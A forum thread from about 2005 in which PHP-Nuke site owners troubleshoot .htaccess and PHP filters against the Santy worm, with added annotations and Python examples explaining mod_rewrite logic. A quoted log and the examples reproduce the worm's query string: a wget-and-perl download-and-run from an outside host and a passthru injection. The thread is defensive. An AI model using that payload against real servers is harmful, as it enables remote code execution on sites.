Ravens PHP Scripts: Forums
Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
yaanno
New Member
Joined: Dec 29, 2004
Posts: 2
PostPosted: Wed Dec 29, 2004 4:40 am

Hi all,

Perhaps we could redirect all queries containing the "http://" string in a way:

RewriteEngine on
#variant-5 redirect all inner http:// request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#variant-6 redirect all inner http request regardless if encoded
#(mod_rewrite tests the raw, still URL-encoded query string, so the encoded form needs its own pattern)
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]
#the conditions need a RewriteRule after them, e.g. the "phantom site" one used in this thread:
RewriteRule ^.*$ http://www.goawayanddontcomeback.com [L]

Sorry for my bad English, guys :)

yaanno
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
PostPosted: Wed Dec 29, 2004 7:51 am

Your English is fine :) That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution!
yaanno
PostPosted: Wed Dec 29, 2004 8:05 am

Raven wrote:
Your English is fine :) That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution!


Thanks Raven,

Unfortunately these solutions don't work without mod_rewrite. And the excellent Sentinel is for newer Nuke systems only. So what about the older versions? Poor guys ;)

My journal currently runs under Nuke 5.6 (oh my god! :) ) and was broken by this worm. So I did a hack in my mainfile.php in this way:

// Added to mainfile.php: reject any GET parameter that looks like the worm.
// The specific "cd /tmp;wget" test now comes before the bare "cd" test; as
// originally ordered the bare "cd" matched first and the specific branch could
// never be reached.
foreach ($HTTP_GET_VARS as $secvalue)
{
    // a <script ...> tag in a parameter (the trailing * makes the "t" optional)
    if (eregi("<[^>]*script*\"?[^>]*>", $secvalue))
    {
        die ("I don't like you...");
    }
    // anything containing "http", which also blocks legitimate URLs in parameters
    elseif (eregi("http", $secvalue))
    {
        die ("Don't bother me...");
    }
    // the worm's shell sequence
    elseif (eregi("cd /tmp;wget", $secvalue))
    {
        die ("I call the FBI...");
    }
    // very broad: matches any value containing "cd" (e.g. "abcd")
    elseif (eregi("cd", $secvalue))
    {
        die ("Go away...");
    }
}

Cheers and happy Worm-ending Year,

yaanno
 
Raven
PostPosted: Wed Dec 29, 2004 8:10 am

Correct again! As has been stated elsewhere, if you're with a host that uses Apache and not mod_rewrite, 86 the host and get another one :roll:
 
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
PostPosted: Mon Jan 03, 2005 11:07 am

LWP::Simple and lwp-trivial are STILL getting through on my site.

My .htaccess, from the top:

Code:
RewriteEngine on

# Flags must be separated from the pattern by whitespace. As first posted they
# were glued on (e.g. ^visualcoders[NC,OR]); Apache then reads "[NC,OR]" as a
# character class inside the regex, no condition carries OR, and the whole
# chain is ANDed. Also, %{REQUEST_URI} begins with "/", so a ^-anchored
# pattern has to allow for that leading slash.
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos [NC,OR]
RewriteCond %{REQUEST_URI} ^civa [NC,OR]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org [NC,OR]
RewriteCond %{REQUEST_URI} ^lwp-trivial [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Bullseye.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailCollector.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Crescent.*Internet.*ToolPak.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^CherryPicker.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^fastlwspider/1.0.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SurfWalker.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWebPage.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
#redirect all inner http:// request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]
RewriteRule ^.*$ noID.php [L]


the reason I have multiple entries for lwp simple and trivial is because I was trying ANYTHING!

I also placed this in my header.php file.

Code:
// Block the worm's user agents and two referers. strpos() returns the offset
// of the first match, which is 0 when the needle is at the very start of the
// string, so the "> 0" test as first posted never fired for "LWP::Simple/5.803";
// compare against false instead. $_SERVER does not depend on register_globals.
$ua  = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
if (strpos($ua, 'LWP::Simple') !== false) {
    exit;
}
if (strpos($ua, 'lwp-trivial') !== false) {
    exit;
}
if (strpos($ref, 'myhost.gb.com') !== false) {
    exit;
}
if (strpos($ref, 'mall.uk.net') !== false) {
    exit;
}
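The `> 0` comparison in cprompt's header.php check fails on exactly the user agent in his reports: PHP's strpos() returns the offset of the match, which is 0 when the needle sits at the very start of the string, and 0 > 0 is false. What follows is an added example in Python, not code from the thread; Python's str.find() returns the offset the same way (and -1 rather than PHP's false when there is no match), so the same off-by-zero mistake reproduces. The user agents and the referer list are constructed, modelled on the "LWP::Simple/5.803" entry in the NukeSentinel report quoted further down this thread; Raven's one-line ^LWP prefix check is included for comparison.

```python
"""Why a strpos()-style "> 0" substring test lets LWP::Simple through.

Added example, not code from the thread.  str.find() returns the offset of
the first match, so a needle at the very start of the string yields 0, which
fails a "> 0" test just as PHP's strpos() does.
"""

BLOCKED_AGENT_SUBSTRINGS = ("LWP::Simple", "lwp-trivial")
BLOCKED_REFERER_SUBSTRINGS = ("myhost.gb.com", "mall.uk.net")


def blocked_by_offset_test(user_agent, referer=""):
    """The logic as first posted: block only if the needle is found at offset > 0."""
    for needle in BLOCKED_AGENT_SUBSTRINGS:
        if user_agent.find(needle) > 0:
            return True
    for needle in BLOCKED_REFERER_SUBSTRINGS:
        if referer.find(needle) > 0:
            return True
    return False


def blocked_by_presence_test(user_agent, referer=""):
    """Corrected logic: block if the needle occurs anywhere (offset >= 0)."""
    for needle in BLOCKED_AGENT_SUBSTRINGS:
        if user_agent.find(needle) != -1:
            return True
    for needle in BLOCKED_REFERER_SUBSTRINGS:
        if referer.find(needle) != -1:
            return True
    return False


def blocked_by_prefix_test(user_agent):
    """Raven's one-liner, RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]:
    a case-insensitive prefix match on the user agent."""
    return user_agent.upper().startswith("LWP")


# Constructed sample user agents (the first is the one from the thread's log,
# the rest are made up for contrast).
SAMPLE_AGENTS = [
    "LWP::Simple/5.803",                        # needle at offset 0
    "lwp-trivial/1.41",                         # needle at offset 0, lower case
    "Mozilla/4.0 (compatible; LWP::Simple)",    # needle later in the string
    "Mozilla/5.0 (X11; Linux) Gecko/20041229",  # legitimate browser
]


def compare(agents=SAMPLE_AGENTS):
    """Return {user_agent: (offset_test, presence_test, prefix_test)}."""
    return {
        ua: (blocked_by_offset_test(ua), blocked_by_presence_test(ua), blocked_by_prefix_test(ua))
        for ua in agents
    }


if __name__ == "__main__":
    for ua, (offset, present, prefix) in compare().items():
        print(f"{ua!r}: offset>0={offset} present={present} prefix^LWP={prefix}")
```

The first two rows are the ones that matter: both worm user agents start with the needle, so the offset test never blocks them while the presence test and the prefix test do. The third row shows the only case the offset test ever catches, a needle somewhere after the first character.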
Raven
PostPosted: Mon Jan 03, 2005 11:49 am

Replace ALL your lwp code with one line:

RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
 
cprompt
PostPosted: Tue Jan 04, 2005 9:19 am

I made your advised change, Raven, and...
I'm STILL getting hit.
Got 10 more emails in my inbox this morning.
LWP::Simple

Quote:
Date & Time: 2005-01-04 07:43:10
Blocked IP: 69.61.61.146
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.803
Query String: [ Only registered users can see links on this board! Get registered or login! ]
%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
wget%20%0Aatlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;
wget%20atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611112;
rm%20sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611111;
rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B
%20%65%63%68%6F%20%5F%45%4E%44%5F&
highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54
%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68
%5D%29.%2527\';
Forwarded For: none
Client IP: none
Remote Address: 69.61.61.146
Remote Port: 43531
Request Method: GET
 
Raven
PostPosted: Tue Jan 04, 2005 9:48 am

Post your .htaccess. I know this works. Something is wrong but it's not that code.
 
cprompt
PostPosted: Tue Jan 04, 2005 9:52 am

Code:
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
RewriteCond %{REQUEST_URI} ^visualcoders [NC]
RewriteCond %{REQUEST_URI} ^envidiosos [NC]
RewriteCond %{REQUEST_URI} ^civa  [NC]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org  [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ [ Only registered users can see links on this board! Get registered or login! ] [L]

php_flag output_buffering on

# One "deny from" per address. As posted the list repeated 148.244.150.52,
# 200.181.83.243, 219.95.196.80 and 80.58.7.235; 192.168.163.167 and
# 10.90.24.11 are private (RFC 1918) addresses, so those two entries only
# matter for traffic from the local network.
deny from 148.244.150.52
deny from 200.106.110.236
deny from 200.181.83.243
deny from 219.95.196.80
deny from 68.60.213.202
deny from 200.72.173.120
deny from 209.237.238.181
deny from 192.168.163.167
deny from 68.98.231.137
deny from 82.160.30.194
deny from 81.215.255.48
deny from 67.165.48.29
deny from 209.13.239.235
deny from 66.82.9.54
deny from 209.237.238.180
deny from 200.64.54.223
deny from 212.200.53.61
deny from 81.214.57.246
deny from 211.157.36.6
deny from 211.157.36.4
deny from 12.175.0.35
deny from 203.162.44.73
deny from 213.103.65.23
deny from 10.90.24.11
deny from 80.132.120.148
deny from 209.237.238.166
deny from 213.103.194.140
deny from 217.220.100.158
deny from 207.230.138.240
deny from 208.180.220.197
deny from 66.69.165.44
deny from 213.103.212.15
deny from 81.15.156.33
deny from 203.203.82.241
deny from 212.244.141.2
deny from 202.58.199.241
deny from 132.249.20.69
deny from 195.151.252.177
deny from 195.151.101.150
deny from 217.23.241.101
deny from 64.86.231.98
deny from 210.177.248.65
deny from 12.170.99.234
deny from 67.131.119.83
deny from 80.58.7.235
deny from 80.58.50.42
deny from 66.98.250.82
 
Raven
PostPosted: Tue Jan 04, 2005 9:59 am

You aren't using [NC,OR]. As a result, the rewrite engine treats those as AND. You had them originally. Put them back.
Code:
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos [NC,OR]
RewriteCond %{REQUEST_URI} ^civa [NC,OR]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org [NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ [ Only registered users can see links on this board! Get registered or login! ] [L]
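Raven's diagnosis is the core mod_rewrite rule: a RewriteCond carrying [OR] is joined to the condition after it, one without [OR] closes the group, and the groups are ANDed, so a chain of plain [NC] conditions fires only when every one of them matches the same request. What follows is an added example in Python, not code from the thread and not Apache's own parser. It splits RewriteCond lines the way Apache does (test string, pattern and an optional [flags] group separated by whitespace, so flags glued to the pattern as in ^LWP[NC,OR] stay inside the regex) and evaluates three shapes of the block seen in this thread against a constructed request modelled on the NukeSentinel report quoted above (the request path is an assumption) and a constructed ordinary browser request.

```python
"""How mod_rewrite combines RewriteCond lines, and why a chain without [OR]
matches nothing.  Added example, not code from the thread or from Apache."""
import re

# Apache splits a RewriteCond line on whitespace into TestString, CondPattern
# and an optional [flags] group.  Anything glued to the pattern (the "[NC,OR]"
# in "^LWP[NC,OR]") is therefore part of the regex, not a flag.
COND_RE = re.compile(r"^RewriteCond\s+%\{(\w+)\}\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$")


def parse_conditions(htaccess):
    """Return [(variable, pattern, flag set)] for every RewriteCond line."""
    conds = []
    for line in htaccess.splitlines():
        line = line.strip()
        if not line.startswith("RewriteCond"):
            continue
        m = COND_RE.match(line)
        if m is None:
            raise ValueError("cannot parse: " + line)
        flags = {f.strip().upper() for f in (m.group(3) or "").split(",") if f.strip()}
        conds.append((m.group(1), m.group(2), flags))
    return conds


def condition_matches(cond, request):
    var, pattern, flags = cond
    re_flags = re.IGNORECASE if flags & {"NC", "NOCASE"} else 0
    return re.search(pattern, request.get(var, ""), re_flags) is not None


def rule_fires(htaccess, request):
    """Apache semantics: a condition flagged OR is joined to the one after it;
    a condition without OR closes the group; the RewriteRule fires only when
    every group contains at least one matching condition."""
    groups, current = [], []
    for cond in parse_conditions(htaccess):
        current.append(cond)
        if not cond[2] & {"OR", "ORNEXT"}:
            groups.append(current)
            current = []
    if current:  # a trailing OR with nothing after it still closes a group
        groups.append(current)
    return all(any(condition_matches(c, request) for c in group) for group in groups)


# Constructed requests.  SANTY_REQUEST is modelled on the NukeSentinel report
# quoted in this thread; the request path is assumed (the report omits it).
SANTY_REQUEST = {
    "HTTP_USER_AGENT": "LWP::Simple/5.803",
    "REQUEST_URI": "/modules.php",
    "QUERY_STRING": ("name=Forums&file=viewtopic&t=1&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B"
                     "%20cd%20/tmp;wget%20atlasol.com/.zk/x&highlight=%2527.%70%61%73%73%74%68%72%75"
                     "%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527"),
}
BROWSER_REQUEST = {
    "HTTP_USER_AGENT": "Mozilla/5.0 (X11; Linux) Gecko/20041229",
    "REQUEST_URI": "/modules.php",
    "QUERY_STRING": "name=Forums&file=viewtopic&t=1",
}

# Three shapes of the same block seen in this thread.
GLUED_FLAGS = """
RewriteCond %{HTTP_USER_AGENT} ^LWP[NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+)[NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
"""
ALL_AND = """
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
RewriteCond %{REQUEST_URI} ^visualcoders [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
"""
ALL_OR = """
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
"""


def evaluate_all():
    """{variant: (fires on the worm request, fires on the browser request)}"""
    variants = {"glued": GLUED_FLAGS, "all_and": ALL_AND, "all_or": ALL_OR}
    return {name: (rule_fires(cfg, SANTY_REQUEST), rule_fires(cfg, BROWSER_REQUEST))
            for name, cfg in variants.items()}


if __name__ == "__main__":
    for name, (worm, browser) in evaluate_all().items():
        print(f"{name:8s} blocks worm={worm} blocks browser={browser}")
```

Only the all-[OR] shape fires on the worm request. The glued shape fails because `^LWP[NC,OR]` is a regex that wants N, C, a comma, O or R right after "LWP", and the worm sends a colon; the all-AND shape fails because the worm's request URI does not start with "visualcoders", and with no OR every group must match. Neither shape touches the browser request, so a config that "does nothing" is indistinguishable from one that works until you feed it the actual attack.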
 
cprompt
PostPosted: Tue Jan 04, 2005 10:06 am

Thanks Raven, I'll give that a try. Thanks for your patience.
 
ring_c
Involved
Joined: Dec 28, 2003
Posts: 276
Location: Israel
PostPosted: Thu Mar 03, 2005 2:41 am

I've tried your code in the .htaccess file, but I still get emails such as this one:

Quote:
Date & Time: 2005-03-03 03:33:55
Blocked IP: 213.167.167.52
User ID: Unregistered user (1)
Reason: Abuse-Harvest
String Match: lwp::simple
--------------------
User Agent: LWP::Simple/5.76
Query String: [ Only registered users can see links on this board! Get registered or login! ]
Forwarded For: none
Client IP: none
Remote Address: 213.167.167.52
Remote Port: 15790
Request Method: GET


Here's my .htaccess. Could you tell me what's wrong?

Code:
# $Author: zx $ 

# $Date: 2003/08/17 14:03:21 $

#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders                [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC,OR]
#Variant-4
#RewriteCond %{QUERY_STRING} ^(.*)wget(.*)               [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L]

# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
  # as posted this block was empty and so denied nothing
  Deny from all
</FilesMatch>

# "deny from 200." blocks the whole of 200.0.0.0/8, not a single host
<Limit GET PUT POST>
  Order Allow,Deny
  deny from 200.
  Allow from all
</Limit>


<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 81.10.16
deny from 212.98.150
deny from 192.118.48.248
 
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1164
PostPosted: Thu Mar 03, 2005 7:50 am

Try this instead:

Find:
Code:
#Check for Santy Worms and redirect them to a phantom site

#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders                [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC,OR]
#Variant-4
#RewriteCond %{QUERY_STRING} ^(.*)wget(.*)               [NC]


And replace with:
Code:
# %{QUERY_STRING} is still URL-encoded, so the patterns list the encoded forms
RewriteCond %{QUERY_STRING} ^(.*)configdir(.*) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20


That pretty much covers mine.

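The patterns in this post list URL-encoded text (rush=\%65\%63\%68 for "echo", wget\%20 for "wget ", highlight=\%2527 for a double-encoded quote) because mod_rewrite's %{QUERY_STRING} is the raw, still-encoded query string. PHP code such as yaanno's mainfile.php filter earlier in the thread sees $HTTP_GET_VARS decoded once, and the phpBB highlight flaw that Santy exploited decoded the parameter a second time, which is what turns %2527 into a bare quote. A filter therefore has to be written for the layer it actually runs at. What follows is an added example in Python, not code from the thread: it decodes a query string zero, one and two times and reports at which layer each pattern proposed in this thread (yaanno's variant-5/variant-6 pair and his mainfile.php "http" test, Raven's variant-3/variant-4, the four above) matches. The two query strings are constructed, one modelled on the blocked request logged earlier (path and parameter order assumed) and one an ordinary url= parameter; the highlight=' pattern is my own addition for the fully decoded form and was not proposed in the thread.

```python
"""Which filter pattern sees the Santy payload at which decoding layer.
Added example, not code from the thread."""
import re
from urllib.parse import unquote

RAW, ONCE, TWICE = "raw", "decoded once", "decoded twice"


def decoding_layers(query_string):
    """The three views of one query string: what mod_rewrite's %{QUERY_STRING}
    holds (raw), what PHP puts in $_GET / $HTTP_GET_VARS (decoded once), and
    what phpBB's highlight code produced when it urldecode()d the value again."""
    once = unquote(query_string)
    return {RAW: query_string, ONCE: once, TWICE: unquote(once)}


# (regex, where it came from in this thread); all are tried case-insensitively,
# as the [NC] flag or eregi() would.  64bitguy wrote "%" as "\%", which matches
# the same literal character.
THREAD_PATTERNS = [
    (r"http://", "yaanno variant-5 (.htaccess)"),
    (r"http%3A%2F%2F", "yaanno variant-6 (.htaccess)"),
    (r"http", "yaanno mainfile.php eregi()"),
    (r"rush=([^&]+)", "Raven variant-3"),
    (r"wget", "Raven variant-4"),
    (r"highlight=%2527", "64bitguy"),
    (r"rush=%65%63%68", "64bitguy"),
    (r"rush=echo", "64bitguy"),
    (r"wget%20", "64bitguy"),
    (r"highlight='", "assumed: fully decoded form, not proposed in the thread"),
]


def layers_matched(query_string, patterns=THREAD_PATTERNS):
    """Return {regex: set of layer names at which the regex matches}."""
    layers = decoding_layers(query_string)
    return {
        pattern: {name for name, text in layers.items() if re.search(pattern, text, re.IGNORECASE)}
        for pattern, _origin in patterns
    }


# Constructed inputs.  SANTY_QUERY is modelled on the blocked request logged
# earlier in this thread (path and parameter order assumed); URL_PARAM_QUERY is
# an ordinary, legitimate URL parameter such as a web-links module might take.
SANTY_QUERY = (
    "name=Forums&file=viewtopic&t=1"
    "&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20atlasol.com/.zk/x;perl%20x"
    "&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527"
)
URL_PARAM_QUERY = "name=Web_Links&url=http%3A%2F%2Fexample.com%2Fpage"


if __name__ == "__main__":
    for label, qs in (("Santy payload", SANTY_QUERY), ("plain URL parameter", URL_PARAM_QUERY)):
        print(label)
        hits = layers_matched(qs)
        for pattern, origin in THREAD_PATTERNS:
            print(f"  {pattern:18s} {origin:55s} {sorted(hits[pattern]) or '-'}")
```

Two things stand out in the output. The worm payload never contains "http://" at any layer (it fetched from bare hostnames), so yaanno's variant-5/variant-6 pair does not fire on it, while his mainfile.php "http" test does fire, but only because PHP has decoded %48%54%54%50 into the "$HTTP_GET_VARS" inside the highlight parameter. And highlight=%2527 is visible to mod_rewrite only in the raw string: after one decode it is %27, after two it is a quote, so a PHP-level filter would have to look for a different string than the .htaccess one.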
ring_c
PostPosted: Thu Mar 03, 2005 4:34 pm

Thanks a lot. Updated.
Now we'll see if more emails are coming in...

thanks again!
 
ring_c
PostPosted: Fri Mar 04, 2005 2:26 am

Yet, no go! :(

Here's one of the three emails I got today:

Code:
Date & Time: 2005-03-03 17:56:03

Blocked IP: 213.196.37.240
User ID: Unregistered user (1)
Reason: Abuse-Harvest
String Match: lwp::simple
--------------------
User Agent: LWP::Simple/5.36
Query String: [ Only registered users can see links on this board! Get registered or login! ]
Forwarded For: none
Client IP: none
Remote Address: 213.196.37.240
Remote Port: 2720
Request Method: GET


HELP!!!!!!!!!!!!
 
Raven
PostPosted: Fri Mar 04, 2005 2:37 am

ring_c, do you have this line in your .htaccess?

RewriteEngine on
 
ring_c
PostPosted: Fri Mar 04, 2005 2:43 am

Raven wrote:
ring_c, do you have this line in your .htaccess?

RewriteEngine on


Nope...

Here's my current .htaccess:

Code:
# $Author: zx $ 

# $Date: 2003/08/17 14:03:21 $

RewriteCond %{QUERY_STRING} ^(.*)configdir(.*)          [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L]

# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
  # as posted this block was empty and so denied nothing
  Deny from all
</FilesMatch>

# "deny from 200." blocks the whole of 200.0.0.0/8, not a single host
<Limit GET PUT POST>
  Order Allow,Deny
  deny from 200.
  Allow from all
</Limit>


<Files 403.shtml>
order allow,deny
allow from all
</Files>


Anything??? :(
 
Raven
PostPosted: Fri Mar 04, 2005 3:36 am

ROTFL. Without that line, mod_rewrite isn't turned on. Therefore, it won't work. Look at the examples above to see how it's supposed to be ;)
 
ring_c
PostPosted: Fri Mar 04, 2005 4:15 am

Quote:
Without that line, mod_rewrite isn't turned on. Therefore, it won't work. Look at the examples above to see how it's supposed to be

Oops... how have I missed that?!

Just a sec.... is mod_rewrite a module I need to install with my PHP-Nuke or something?
 
Raven
PostPosted: Fri Mar 04, 2005 4:23 am

mod_rewrite is an Apache module. Run phpinfo() to see if it is installed.
 
VinDSL
Life Cycles Becoming CPU Cycles
Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com
PostPosted: Fri Mar 04, 2005 5:05 am

Raven wrote:
ROTFL. Without that line, mod_rewrite isn't turned on. Therefore, it won't work. Look at the examples above to see how it's supposed to be

True! Generally speaking, rewrite configurations are not inherited, even though the conditions, rules, et cetera are. So, I always add this line (once) at the top of all my .htaccess file[s] just to play it safe... ;)

ring_c
PostPosted: Fri Mar 04, 2005 6:20 am

Quote:
mod_rewrite is an Apache module. Run phpinfo() to see if it is installed.

I don't have access to the shell (command prompt). :(
Is there any other way to tell?
 
ring_c
PostPosted: Fri Mar 04, 2005 6:25 am

Oh, I've found my host company provides a link to run phpinfo(). I've searched for "rewrite" and only found this:

Under Configuration/Standard there's a table. The relevant line says:
Directive: url_rewriter.tags
Local Value: a=href,area=href,frame=src,form=,fieldset=
Master Value: a=href,area=href,frame=src,form=,fieldset=

Is that ok?
 
Raven
PostPosted: Fri Mar 04, 2005 7:34 am

You don't need a shell anyway. Just save this script to a file and run it:
Code:
<?php
phpinfo();
?>

Scroll down to the Apache: Loaded Modules section and see if mod_rewrite is listed
Code:
mod_auth_passthrough, mod_log_bytes, mod_bwlimited, mod_php4, mod_frontpage, mod_ssl, mod_setenvif, mod_so, mod_auth, mod_access, MOD_REWRITE, mod_alias, mod_userdir, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_config, mod_env, http_core
 
ring_c
PostPosted: Fri Mar 04, 2005 8:07 am

Raven wrote:
You don't need a shell anyway. Just save this script to a file and run it:
Code:
<?php
phpinfo();
?>

Scroll down to the Apache: Loaded Modules section and see if mod_rewrite is listed
Code:
mod_auth_passthrough, mod_log_bytes, mod_bwlimited, mod_php4, mod_frontpage, mod_ssl, mod_setenvif, mod_so, mod_auth, mod_access, MOD_REWRITE, mod_alias, mod_userdir, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_config, mod_env, http_core


Thanks, done that, and it seems to be the exact page my host supplied before. Yet, no mod_rewrite anywhere on that page.

Couldn't find any "Loaded Modules" there either.
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours